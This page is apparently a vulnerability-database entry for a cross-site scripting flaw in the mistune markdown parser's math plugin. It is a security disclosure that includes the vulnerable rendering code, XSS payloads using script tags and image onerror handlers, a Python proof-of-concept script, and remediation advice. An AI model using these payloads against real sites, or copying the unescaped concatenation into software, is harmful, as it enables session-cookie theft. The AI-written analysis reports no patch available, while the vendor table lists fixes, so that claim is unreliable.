Mistune Math Plugin CVE-2026-44708
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
3Blast Radius
ecosystem impact- 4 pypi packages depend on mistune (4 direct, 0 indirect)
Ecosystem-wide dependent count for version 3.2.0.
DescriptionGitHub Advisory
Summary
The mistune math plugin renders inline math ($...$) and block math ($$...$$) by concatenating the raw user-supplied content directly into the HTML output without any HTML escaping. This occurs even when the parser is explicitly created with escape=True, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM.
The result is a silent contract violation: a developer who enables escape=True reasonably expects complete XSS protection, but the math plugin operates as an independent render path that ignores the renderer's _escape flag entirely.
Details
File: src/mistune/plugins/math.py
def render_inline_math(renderer, text):
# `text` is raw user input - no escape() call anywhere
return r'<span class="math">\(' + text + r"\)</span>"
def render_block_math(renderer, text):
# same issue for block-level $$...$$
return '<div class="math">$$\n' + text + "\n$$</div>\n"Both functions take text directly from the parsed token and concatenate it into the output string. Neither function:
- calls
escape(text)frommistune.util - checks
renderer._escape - calls
safe_entity(text)or any other sanitisation helper
The escape=True flag only influences the main HTMLRenderer methods (paragraph, heading, codespan, etc.). Plugin render functions registered via md.renderer.register() receive the renderer instance but have no mechanism that enforces the escape contract - they must opt in manually, and math.py does not.
PoC
Step 1 - Establish the baseline (escape=True works for plain HTML)
The script creates a markdown parser with escape=True and the math plugin enabled, then feeds it a raw <script> tag that is *not* inside math delimiters:
md = create_markdown(escape=True, plugins=["math"])
bl_src = "<script>alert(document.cookie)</script>\n"
bl_out = str(md(bl_src))Expected and actual output - the script tag is correctly escaped:
<p><script>alert(document.cookie)</script></p>This confirms escape=True is working for the normal render path.
Step 2 - Craft the exploit payload
Wrap the identical <script> payload inside inline math delimiters $...$. The content is token-extracted as text and handed to render_inline_math():
ex_src = "$<script>alert(document.cookie)</script>$\n"
ex_out = str(md(ex_src))Step 3 - Observe the bypass
Actual output - the script tag is emitted raw, unescaped:
<p><span class="math">\(<script>alert(document.cookie)</script>\)</span></p>The <script> block is live inside the <span class="math"> wrapper. Any browser that renders this HTML will execute alert(document.cookie).
Step 4 - Block math variant ($$...$$)
The same bypass applies to block-level math. Payload:
$$
<img src=x onerror="alert(document.cookie)">
$$Output:
<div class="math">$$
<img src=x onerror="alert(document.cookie)">
$$</div>The onerror handler fires as soon as the browser tries to load the non-existent image x.
Script
A verification script was written to test this issue. It creates a HTML page showing the bypass rendering in the browser.
#!/usr/bin/env python3
"""H1: Math plugin bypasses escape=True - HTML inside $...$ passes through raw."""
import os, html as h
from mistune import create_markdown
md = create_markdown(escape=True, plugins=["math"])
# --- baseline ---
bl_file = "baseline_h1.md"
bl_src = "<script>alert(document.cookie)</script>\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
f.write(bl_src)
bl_out = str(md(bl_src))
print(f"[{bl_file}]\n{bl_src}")
print("[output - escape=True works normally here]")
print(bl_out)
# --- exploit ---
ex_file = "exploit_h1.md"
ex_src = "$<script>alert(document.cookie)</script>$\n"
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
f.write(ex_src)
ex_out = str(md(ex_src))
print(f"[{ex_file}]\n{ex_src}")
print("[output - escape=True bypassed inside math delimiters]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
def case(kind, label, filename, src, out):
return f"""
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} - {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input - {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output - HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H1 - Math XSS</title><style>{CSS}</style></head><body>
<h1>H1 - Math Plugin XSS (escape=True bypass)</h1>
<p class="desc">render_inline_math() in plugins/math.py concatenates user content without escape().
The escape=True renderer flag is completely ignored inside $...$ delimiters.</p>
{case("baseline", "Same HTML outside $...$ - escape=True works", bl_file, bl_src, bl_out)}
{case("exploit", "Same HTML inside $...$ - escape=True bypassed", ex_file, ex_src, ex_out)}
</body></html>"""
out_path = os.path.join(os.getcwd(), "report_h1.html")
with open(out_path, "w") as f:
f.write(page)
print(f"\n[report] {out_path}")Example usage:
python poc.pyOnce the script is run, open report_h1.html in the browser and observe the behaviour.
Impact
| Dimension | Assessment |
|---|---|
| Confidentiality | Attacker can exfiltrate session cookies, auth tokens, and any data visible to the victim's browser session |
| Integrity | Attacker can mutate page content, inject phishing forms, redirect the user, or perform authenticated actions |
| Availability | Attacker can crash or freeze the page (denial-of-service to the user) |
Risk amplifier: This is a *bypass* of an explicit security control. Developers who have audited their application and confirmed escape=True is set believe they have XSS protection. This vulnerability silently invalidates that assumption for every math-enabled parser instance, making it likely to be missed in code reviews and security audits.
AnalysisAI
Cross-site scripting (XSS) vulnerability in the Mistune markdown parser's math plugin bypasses the escape=True security setting by rendering inline ($...$) and block ($$...$$) math content without HTML escaping. Attackers can inject arbitrary JavaScript that executes in the victim's browser session when a developer-controlled application parses untrusted markdown with the math plugin enabled, even when the parser is explicitly configured to sanitize all user input. Proof-of-concept code demonstrates script tag injection and image onerror handler exploitation; no public exploit code identified at time of analysis.
Technical ContextAI
Mistune is a lightweight markdown parser library used in Python applications to convert user-supplied markdown text to HTML. The math plugin extends the parser to recognize inline math syntax ($...$) and block math syntax ($$...$$), commonly used in documentation and scientific content. The vulnerability exists in src/mistune/plugins/math.py where the render_inline_math() and render_block_math() functions receive parsed token content and concatenate it directly into HTML output strings without calling any sanitization helpers. The root cause is a design flaw in the plugin architecture: the main HTMLRenderer respects the escape=True initialization flag across core methods like paragraph(), heading(), and codespan() by checking renderer._escape and conditionally applying escape(text) from mistune.util. However, plugin render functions registered via md.renderer.register() receive the renderer instance but have no enforced contract to respect the escape flag-they operate as independent code paths and must manually invoke escape helpers. The math plugin does not perform this manual escaping, creating a silent bypass of the security control.
RemediationAI
No vendor-released patch identified at time of analysis. The immediate remediation is to disable the math plugin if it is not essential to the application's functionality by removing plugins=['math'] from the create_markdown() call or using create_markdown(plugins=[...]) without the math plugin. If math rendering is required, implement input validation to reject or sanitize user-supplied markdown that contains math delimiters ($ and $$) before passing it to Mistune, or apply a post-processing HTML sanitizer (such as bleach or nh3) to the rendered output to strip script tags and event handlers regardless of escape settings. A more robust compensating control is to wrap the Mistune renderer and override the math plugin's render functions: register a custom render_inline_math() function that calls escape(text) before concatenating it into the HTML span, and similarly for render_block_math(). This requires code modification but provides comprehensive protection. Any workaround carries the trade-off that legitimate mathematical notation containing special characters may be incorrectly escaped or filtered; test thoroughly with realistic math content before deploying. Monitor the GitHub advisory (https://github.com/lepture/mistune/security/advisories/GHSA-8g87-j6q8-g93x) for upstream patch availability and upgrade immediately once a fixed version is released.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allVendor StatusVendor
SUSE
Severity: Medium| Product | Status |
|---|---|
| SUSE Linux Enterprise Desktop 15 SP7 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP4 | Fixed |
| SUSE Linux Enterprise Server 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP5 | Fixed |
| SUSE Linux Enterprise Server 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP6-LTSS | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | Fixed |
| SUSE Manager Proxy 4.3 | Fixed |
| SUSE Manager Retail Branch Server 4.3 | Fixed |
| SUSE Manager Server 4.3 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP4 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP5 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP6 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | Fixed |
| openSUSE Leap 15.3 | Fixed |
| openSUSE Leap 15.4 | Fixed |
| openSUSE Leap 15.5 | Fixed |
| openSUSE Leap 15.6 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-8g87-j6q8-g93x